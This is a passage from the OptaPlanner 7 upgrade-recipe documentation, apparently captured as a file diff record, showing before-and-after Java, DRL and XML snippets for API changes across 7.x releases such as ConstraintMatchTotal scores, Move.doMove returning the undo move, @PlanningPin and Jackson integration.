guiScoreDirector.getConstraintMatchTotals()) {\n int scoreLevel = constraintMatchTotal.getScoreLevel();\n Integer weightTotal = (Integer) constraintMatchTotal.getWeightTotalAsNumber();\n String text = weightTotal.toString() + (scoreLevel == 0 ? \"hard\" : \"soft\");\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n HardSoftScore scoreTotal = (HardSoftScore) constraintMatchTotal.getScoreTotal();\n String text = scoreTotal.toShortString();\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getConstraintMatchTotals()` impact\n\nWhen implementing the interface `ConstraintMatchAwareIncrementalScoreCalculator`'s method `getConstraintMatchTotals()`,\nthe constructor of `ConstraintMatchTotal` and the method `addConstraintMatch(...)`\nnow use `Score` instances instead of numbers.\n\nBefore in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n LongConstraintMatchTotal maximumCapacityMatchTotal = new LongConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", 0);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., - weight);\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ConstraintMatchTotal maximumCapacityMatchTotal = new ConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", HardSoftLongScore.ZERO);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., HardSoftLongScore.valueOf(- weight, 0));\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Score rule that changes 2 score levels: call `addMultiConstraintMatch()`\n\nA score rule that changes 2 score levels in its RHS\nmust now call `addMultiConstraintMatch()` instead of 2 separate `add*ConstraintMatch()` calls.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMediumConstraintMatch(kcontext, -3); \/\/ Financial cost\n scoreHolder.addSoftConstraintMatch(kcontext, -4); \/\/ Employee happiness cost\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMultiConstraintMatch(kcontext, 0, -3, -4);\nend\n----\n\nWhen calling `guiScoreDirector.getConstraintMatchTotals()`,\nthere is now also only one `ConstraintMatchTotal` instance for this score rule\nand only one `ConstraintMatch` instance per fired rule.\n
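\nFor example, a minimal sketch (rule name taken from above, variable names hypothetical) of inspecting that single multi-level total, assuming a `HardMediumSoftScore` score definition:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n if (constraintMatchTotal.getConstraintName().equals(\"Costly and unfair\")) {\n \/\/ One total that combines all levels, for example 0hard\/-3medium\/-4soft\n HardMediumSoftScore scoreTotal = (HardMediumSoftScore) constraintMatchTotal.getScoreTotal();\n String text = scoreTotal.toShortString();\n ...\n }\n }\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: `toShortString()` added\n\nIf you have a custom `ScoreDefinition`: the `Score` interface has another new method `toShortString()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... 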
{\n ...\n @Override\n public String toShortString() {\n return buildShortString((n) -> ((Integer) n).intValue() != 0, HARD_LABEL, SOFT_LABEL);\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Move`: `createUndoMove()` and `doMove()` changed\n\nThe `Move` interface has changed: `doMove()` now returns the undo move, so `createUndoMove()` has been removed.\nThis was needed to fix a bug in `CompositeMove`.\nHowever, `AbstractMove` completely deals with this change, so *your custom move implementation stays the same*.\n\nIn the very rare case that you're actually calling `createUndoMove()` yourself,\nuse the return value of `doMove()` instead.\n\nBefore in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.createUndoMove(scoreDirector);\n move.doMove(scoreDirector);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.doMove(scoreDirector);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `ScoreDefinition`: `getZeroScore()` added\n\nIf you have a custom `ScoreDefinition`: the `ScoreDefinition` interface has another new method `getZeroScore()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic class HardSoftScoreDefinition extends AbstractFeasibilityScoreDefinition<HardSoftScore> {\n ...\n\n @Override\n public HardSoftScore getZeroScore() {\n return HardSoftScore.ZERO;\n }\n}\n----\n\n\n== From 7.0.0.Beta7 to 7.0.0.CR1\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getIndictmentMap()` added\n\nIf you're using a Java incremental score calculator that is also `ConstraintMatch` aware,\nit now needs to also implement the method `getIndictmentMap()`.\nSimply `return null` to have it calculated automatically from the return value of `getConstraintMatchTotals()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n\n @Override\n public Map<Object, Indictment> getIndictmentMap() {\n return null; \/\/ Calculate it non-incrementally from getConstraintMatchTotals()\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `MoveListFactory` and `MoveIteratorFactory`: method return `Move<Solution_>`\n\nThe `MoveListFactory` and `MoveIteratorFactory` methods now use `Move<Solution_>` instead of a raw-typed `Move`.\nThis way your `MoveListFactory` can return `List<ChangeMove<MySolution>>` instead of `List<ChangeMove>`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<Move> createMoveList(CloudBalance solution) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates generic `ChangeMove` instances):\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<ChangeMove<CloudBalance>> createMoveList(CloudBalance cloudBalance) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates `CloudComputerChangeMove` instances and that implements 
`Move<CloudBalance>`):\n\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<CloudComputerChangeMove> createMoveList(CloudBalance cloudBalance) {\n ...\n }\n\n}\n----\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<Move> createOriginalMoveIterator(...) {...}\n public Iterator<Move> createRandomMoveIterator(...) {...}\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<CheapTimePillarSlideMove> createOriginalMoveIterator(...) {...}\n public Iterator<CheapTimePillarSlideMove> createRandomMoveIterator(...) {...}\n\n}\n----\n\n\n== From 7.0.0.CR3 to 7.0.0.Final\n\n[.upgrade-recipe-impl-detail]\n=== Workbench's `AbstractSolution` deprecated\n\nThe implementation class `AbstractSolution`, used only by workbench 6,\nhas been deprecated and replaced by the `autoDiscoverMemberType` feature.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class MySolution extends AbstractSolution<HardSoftScore> {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution(autoDiscoverMemberType = AutoDiscoverMemberType.FIELD)\npublic class MySolution {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n== From 7.1.0.Beta2 to 7.1.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `<valueSelector>`: `variableName` is now an attribute\n\nWhen power tweaking move selectors, such as `<changeMoveSelector>`,\nin a use case with multiple planning variables,\nthe `<variableName>` XML element has been replaced by a `variableName=\"...\"` XML attribute.\nThis reduces the solver configuration verbosity.\nFor backwards compatibility, the old way is still supported in the 7.x series.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector>\n <variableName>room<\/variableName>\n <\/valueSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector variableName=\"room\"\/>\n----\n\n[.upgrade-recipe-minor]\n=== Construction Heuristic: multiple variable power tweaking simplified\n\nIt's now easier to configure construction heuristics that scale better for multiple variables,\nby assigning one variable at a time.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <queuedEntityPlacer>\n <entitySelector id=\"placerEntitySelector\"\/>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n <\/queuedEntityPlacer>\n <\/constructionHeuristic>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <constructionHeuristicType>FIRST_FIT<\/constructionHeuristicType>\n <changeMoveSelector>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n 
<\/constructionHeuristic>\n----\n\n\n== From 7.1.0.Final to 7.2.0.Final\n\nThere is no impact on your code.\n\n\n== From 7.2.0.Final to 7.3.0.Final\n\n[.upgrade-recipe-minor]\n=== `SolutionFileIO`: `getOutputFileExtension()` is now defaulted\n\nIt's no longer needed to implement `getOutputFileExtension()` of the `SolutionFileIO` interface\nif it returns the same as `getInputFileExtension()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n @Override\n public String getOutputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: direct POJO input\n\nThe benchmarker now also accepts problem instances directly, without reading them from disk.\nIf you're generating your problems or fetching them from a database,\nit might be interesting to switch to this approach (otherwise stick with the old approach because it works offline).\n\nBefore in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n CloudBalanceFileIO solutionFileIO = new CloudBalanceFileIO();\n solutionFileIO.write(problem1, new File(\"tmp\/problem1.xml\"));\n solutionFileIO.write(problem2, new File(\"tmp\/problem2.xml\"));\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark();\n plannerBenchmark.benchmark();\n----\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <solutionFileIOClass>...CloudBalanceFileIO<\/solutionFileIOClass>\n <inputSolutionFile>tmp\/problem1.xml<\/inputSolutionFile>\n <inputSolutionFile>tmp\/problem2.xml<\/inputSolutionFile>\n ...\n <\/problemBenchmarks>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark(problem1, problem2, ...);\n plannerBenchmark.benchmark();\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: `BEST_SCORE` statistic by default\n\nThe benchmarker now includes the `BEST_SCORE` statistic by default.\nIt no longer needs to be explicitly configured.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticType>BEST_SCORE<\/problemStatisticType>\n <\/problemBenchmarks>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <\/problemBenchmarks>\n----\n\nTo disable the `BEST_SCORE` statistic, use `<problemStatisticEnabled>` in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticEnabled>false<\/problemStatisticEnabled>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-major]\n=== `ScoreDirector`: `dispose()` replaced by `close()`\n\n`ScoreDirector` now implements `AutoCloseable`,\nso the `dispose()` method has been deprecated and replaced by `close()`.\n\nBefore in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n 
scoreDirector.dispose();\n----\n\nAfter in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n scoreDirector.close();\n----\n\nAfter in `*.java` (with ARM usage):\n[source, java]\n----\n try (ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector()) {\n ...\n }\n----\n\n\n== From 7.3.0.Final to 7.4.0.Final\n\n[.upgrade-recipe-minor]\n=== `movableEntitySelectionFilter` is now inherited\n\nAn entity's `movableEntitySelectionFilter` is now inherited by child entities.\nThe workaround of configuring the filter twice is now obsolete.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Dog extends Animal {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity()\npublic class Dog extends Animal {\n ...\n}\n----\n\n\n== From 7.4.0.Final to 7.5.0.Final\n\n[.upgrade-recipe-minor]\n=== `Indictment`: natural comparison changed\n\nAn `Indictment` is now naturally sorted by its justification.\nTo sort it based on its score, use `IndictmentScoreTotalComparator`.\n\nBefore in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList, new IndictmentScoreTotalComparator());\n----\n\n\n== From 7.5.0.Final to 7.6.0.Final\n\n[.upgrade-recipe-minor]\n=== `PlannerBenchmark`: new method `benchmarkAndShowReportInBrowser()`\n\nIf you're running local benchmarks, this new method will save time by opening the report automatically.\n\nBefore in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmark();\n\/\/ Afterwards manually find the benchmark dir to open the report\n----\n\nAfter in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmarkAndShowReportInBrowser();\n----\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `Indictment.addConstraintMatch()` changed\n\nThis only applies if you're implementing `ConstraintMatchAwareIncrementalScoreCalculator`\nand you do not simply return `null` in `getIndictmentMap()`.\n\nThe method `Indictment.addConstraintMatch(ConstraintMatch)` now returns void instead of a boolean.\nIf the same `ConstraintMatch` is added twice, it now fails fast instead of returning false.\nIf the same `ConstraintMatch` has the same justification twice,\nit must now be added to that justification's `Indictment` only once.\n
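\nFor example, a minimal sketch of filling an `Indictment` under the new contract (justification and match variables hypothetical, assuming the `Indictment(justification, zeroScore)` constructor):\n[source, java]\n----\n Indictment indictment = new Indictment(processJustification, HardSoftLongScore.ZERO);\n indictment.addConstraintMatch(constraintMatch); \/\/ Now returns void\n \/\/ Adding the exact same ConstraintMatch a second time now fails fast\n \/\/ with an exception instead of returning false.\n----\n\n\n== From 7.6.0.Final to 7.7.0.Final\n\n[.upgrade-recipe-major]\n=== Replace `movableEntitySelectionFilter` with `@PlanningPin` when possible\n\nIn many cases, the complex use of a `movableEntitySelectionFilter` to pin down planning entities\ncan be simplified by a `@PlanningPin` annotation on a field or method\nthat returns true if the entity is immovable.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = MovableLectureSelectionFilter.class)\npublic class Lecture {\n private boolean pinned;\n\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n[source, java]\n----\npublic class MovableLectureSelectionFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n return 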
!lecture.isPinned();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity\npublic class Lecture {\n private boolean pinned;\n\n @PlanningPin\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: use `OptaPlannerJacksonModule`\n\nInstead of using `@JsonSerialize` and `@JsonDeserialize` Jackson annotations on every `Score` field,\njust register `OptaPlannerJacksonModule` once.\n\nBefore in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n @JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n @JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n objectMapper.registerModule(OptaPlannerJacksonModule.createModule());\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n private HardSoftScore score;\n\n ...\n}\n----\n
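\nWith the module registered, `Score` fields round-trip without per-field annotations. A minimal sketch (solution instance and score value hypothetical):\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n objectMapper.registerModule(OptaPlannerJacksonModule.createModule());\n \/\/ The score is written as a simple string, for example \"-1hard\/-20soft\",\n \/\/ and parsed back into a HardSoftScore when reading:\n String json = objectMapper.writeValueAsString(solution);\n MySolution copy = objectMapper.readValue(json, MySolution.class);\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: replace `ScoreJacksonJsonSerializer`\n\nIf you do prefer to use `@JsonSerialize` and `@JsonDeserialize` Jackson annotations,\ninstead of registering `OptaPlannerJacksonModule`,\nreplace `ScoreJacksonJsonSerializer` with a specific serializer,\nsuch as `HardSoftScoreJacksonJsonSerializer`.\nThis won't affect the JSON output.\n\n`ScoreJacksonJsonSerializer` is deprecated.\n\nBefore in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = HardSoftScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\n\n== From 7.7.0.Final to 7.8.0.Final\n\n\n[.upgrade-recipe-minor]\n=== Partitioned Search: `threadFactoryClass` moved\n\nNow that `<solver>` directly supports a `<threadFactoryClass>` element,\nthe `<threadFactoryClass>` element under `<partitionedSearch>` has been deprecated.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n ...\n <partitionedSearch>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <partitionedSearch>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchTotal` and `Indictment`: `getScoreTotal()` renamed to `getScore()`\n\nThe `getScoreTotal()` methods on `ConstraintMatchTotal` and `Indictment`\nhave been deprecated and replaced by `getScore()`.\nThose deprecated methods will be removed in 8.0.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScore();\n----\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = indictment.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = indictment.getScore();\n----\n\n\n[.upgrade-recipe-minor]\n=== `IndictmentScoreTotalComparator` renamed to `IndictmentScoreComparator`\n\nThe comparator 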
`IndictmentScoreTotalComparator` has been deprecated\nand replaced by `IndictmentScoreComparator`.\nThe deprecated class will be removed in 8.0.\n\n\nBefore in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreTotalComparator());\n----\n\nAfter in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreComparator());\n----\n\n\n== From 7.11.0.Final to 7.12.0.Final\n\n\n[.upgrade-recipe-major]\n=== Chained ChangeMove: cache type `PHASE` no longer supported\n\nTo work correctly with multithreaded solving,\n`ChainedChangeMove` and `ChainedSwapMove` aren't `PHASE` cacheable any longer.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector><!-- On at least 1 chained variable -->\n <cacheType>PHASE<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector>\n <cacheType>STEP<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n","old_contents":"= Upgrade recipe 7\n:awestruct-description: Upgrade to OptaPlanner 7 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7\n\n\n== From 6.5.0.Final to 7.0.0.Beta1\n\n=== Backwards incompatible changes to the public API in 7.0\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nWe kept these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and will not introduce any additional ones during the 7.x era.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Deprecated methods removed\n\nThe following long term deprecated methods have been finally removed:\n\n* Setters on `ScoreHolder` implementations, such as `HardSoftScoreHolder.setHardScore(int)` and `setSoftScore(int)`.\nUse `addHardConstraintMatch(...)` and `addSoftConstraintMatch(...)` in your score rules instead.\nSee link:.\/upgradeRecipe6.0.html[this upgrade recipe].\n\n* The experimental, deprecated, hybrid metaheuristic called `LATE_SIMULATED_ANNEALING`\n(which was inspired by both Late Acceptance and Simulated Annealing) has been removed.\n\n* The dead, deprecated code of `DeciderScoreComparatorFactory` has been removed.\nSee link:.\/upgradeRecipe6.2.html[this upgrade recipe].\n\n* The deprecated `SolverBenchmarkBluePrintType.ALL_CONSTRUCTION_HEURISTIC_TYPES` has been removed.\nSee link:.\/upgradeRecipe6.3.html[this upgrade recipe].\n\n\n[.upgrade-recipe-major]\n=== `Solution` interface removed (deprecated)\n\nYour solution class no longer needs to have both the `@PlanningSolution` annotation and implement the `Solution` interface,\nonly the annotation suffices. 
The `Solution` interface has been deprecated and will be removed in a future version.\n\nRemove the `Solution` interface, annotate the `getScore()` method with `@PlanningScore`\nand replace the `getProblemFacts()` method with a `@ProblemFactCollectionProperty` annotation directly on every problem fact getter (or field).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n public List<CloudComputer> getComputerList() {...}\n\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n public Collection<? extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n public List<CloudComputer> getComputerList() {...}\n\n @PlanningScore\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n}\n----\n\nFor a single problem fact (which is not wrapped in a `Collection`), use the `@ProblemFactProperty` annotation,\nas shown below (with field annotations this time).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private CloudParametrization parametrization;\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n private List<CloudComputer> computerList;\n ...\n\n public Collection<? 
extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.add(parametrization); \/\/ not a Collection\n facts.addAll(buildingList);\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n @ProblemFactProperty\n private CloudParametrization parametrization;\n @ProblemFactCollectionProperty\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n private List<CloudComputer> computerList;\n ...\n\n}\n----\n\nDon't add the `@ProblemFactCollectionProperty` annotation on getters (or fields)\nthat have a `@PlanningEntityCollectionProperty` annotation.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `Solver`: return values no longer implement `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `Solver.solve(...)` and `Solver.getBestSolution()` methods now return an `Object` instead of a `Solution` instance\n(if and only if no type parameter is specified for the `Solver`).\n\n*This only applies if you're still using a `Solver` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolution s = solver.solve(problem);\nCloudBalance solution = (CloudBalance) s;\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nCloudBalance solution = (CloudBalance) solver.solve(problem);\n----\n\nAfter in `*.java` (recommended fix):\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\n...\nCloudBalance solution = solver.solve(problem);\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `BestSolutionChangedEvent.getNewBestSolution()`: return value no longer implements `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `BestSolutionChangedEvent.getNewBestSolution()` method now returns an `Object`\n(if and only if no type parameter is specified for the `SolverEventListener`).\n\n*This only applies if you're still using a `SolverEventListener` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolverFactory factory = SolverFactory.createFromXmlResource(...);\nSolver solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent event) {\n Solution s = event.getNewBestSolution();\n CloudBalance solution = (CloudBalance) s;\n ...\n }\n});\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener<CloudBalance>() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n CloudBalance solution = event.getNewBestSolution();\n ...\n }\n});\n----\n\nAnd you'll probably want to use a lambda here:\n\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = 
